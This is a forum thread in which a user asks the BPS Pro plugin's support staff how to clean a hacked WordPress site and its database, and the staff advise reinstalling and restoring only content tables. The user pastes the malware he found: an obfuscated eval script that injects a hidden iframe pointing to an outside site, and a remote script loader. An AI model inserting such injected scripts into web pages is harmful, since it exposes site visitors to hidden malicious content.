Database Clean-up using BPS Pro-Tools

Home Forums BulletProof Security Pro Database Clean-up using BPS Pro-Tools

Viewing 5 posts - 1 through 5 (of 5 total)
  • Author
    Posts
  • #12723
    Paul D.
    Participant

    Hi Keymaster Ed !

    I want to inquire of the proper usage of BPS Pro-Tools. Can you add a more detailed documentation for all of the tools available there in the future? We encountered a problem with one of my employer’s site (the employer said she bought BPS Pro, but I have yet to confirm it). The site was suspended (on and off) because of excessive bandwidth usage. She asked me to fix it, so I checked it. I checked it first via sucuri online scanner to confirm if it’s infected or what nots. Sure enough, it is. It appeared that some of the php pages have been “injected” with some html code , advertising viagra and other drugs. I checked all php pages and found this :

    <script language="javascript">
    eval(function(p,a,c,k,e,r){e=String;if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'[1]'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('document.body.innerHTML="<iframe src=\'http://www.turbil.net/\' frameborder=\'0\' width=\'1%\' height=\'1%\' />";',[],2,'|100'.split('|'),0,{}))
    </script>
    
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1000140969'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s22.cnzz.com/z_stat.php%3Fid%3D1000140969%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>

    I investigated further and found this :

    eval(base64_decode("THIS PART IS TOO LONG I HAVE TO SCROLL DOWN"));

    After searching Google and BPS Pro threads, I tried decoding it using BPS Pro-Tools Online Base64 Decoder and after I hit Decode button, my antivirus blocked this :  http://oi41.tinypic.com/1y5mjs.jpg

    So my question is : How can I “sanitize” an exported SQL database from a “compromised”/malwared/hacked CMS ?  The site was compromised, and I’m not sure of up to what extent. What I did so far is to export sql database, export xml, download gallery folders/images .. From a local testing server, I managed to start clean using fresh CMS core install, import xml (for site structure), and import sql database. I also installed a clean copy of the theme used. looking back, I pondered that the database I exported and imported may contain “malicious” stuff. So, how can I “sanitize” the database ? Through queries ? Or any database tool ? Can it be done using BPS Pro-Tools ? How?

    Thanks!

    #12726
    AITpro Admin
    Keymaster

    UPDATE: BPS Pro 13.3+ and BPS free 2.4+ versions have a malware scanner > BPS MScan Malware Scanner
    You can use the BPS MScan Malware Scanner to detect hacker files or code anywhere under your Hosting Account or database.

    If a website is already hacked then it is much simpler and quicker to backup your existing site files and database, put the site in maintenance mode or take it offline some other way, change all passwords, delete the existing site, reinstall everything brand new and import ONLY your WordPress content database tables into your new WordPress database or if you have a backup of the site and database that you are 100% sure is clean then delete the existing site and restore it from that backup that you are 100% sure is clean.

    http://forum.ait-pro.com/forums/topic/website-is-already-hacked-will-bps-pro-automatically-fix-or-remove-the-hackers-files-and-code/

    Dehacking a website is time consuming even for a seasoned professional so the quicker and simpler method that guarantees the site is 100% clean is to nuke it and do selective restoration of database content tables ONLY.

    Trying to explain and document how to use the Pro-Tools tools that can be used to dehack a website would mean trying to condense a lifetime of knowledge and experience into something simple and easy to understand for the average person.  In other words, that would be a very foolish and time consuming task to try and attempt and the end result would most likely be a lot of wasted time for everyone involved.  The scope of website dehacking (what to look for, must be able to read, understand and write code proficiently, etc.) is simply too great to be condensed into anything that could be usable for the average person.

    #12732
    Paul D.
    Participant

    Actually, I mean if its possible to use BPS Pro Tool to search database for “strings” and replace/delete it. And how to do that. That’s all. I may have worded my first post incorrectly.

    #12734
    AITpro Admin
    Keymaster

    UPDATE: BPS Pro 13.3+ and BPS free 2.4+ versions have a malware scanner > BPS MScan Malware Scanner
    You can use the BPS MScan Malware Scanner to detect hacker files or code anywhere under your Hosting Account or database.

    The DB String Finder tool will search for DB strings, but does not have the capability to replace DB strings and we are not planning on adding that capability.  The logic is once you have found the DB strings you are looking for then you would use a plugin like Adminer or phpMyAdmin directly since doing DB string replacements could have catastrophic results if done improperly or if a typo was made.  A person needs to fully understand DB Table relationships and other things about their DB before choosing to replace DB data in any particular Table.  Trying to code the DB String Finder tool to find those DB Table relationships is more effort than the time it is worth.  To do something like that it would be better to create an entirely new plugin that focuses specifically on those tasks.  Or in other words, it is a project/plugin that we are not planning on doing/creating at this point

    #12737
    Paul D.
    Participant

    Thanks for the detailed explanation Edward. I will check the link you provided above for things I overlooked/missed doing. As always, BPS Pro support is always enlightening and helpful for us end-users.

    Paul

Viewing 5 posts - 1 through 5 (of 5 total)
  • You must be logged in to reply to this topic.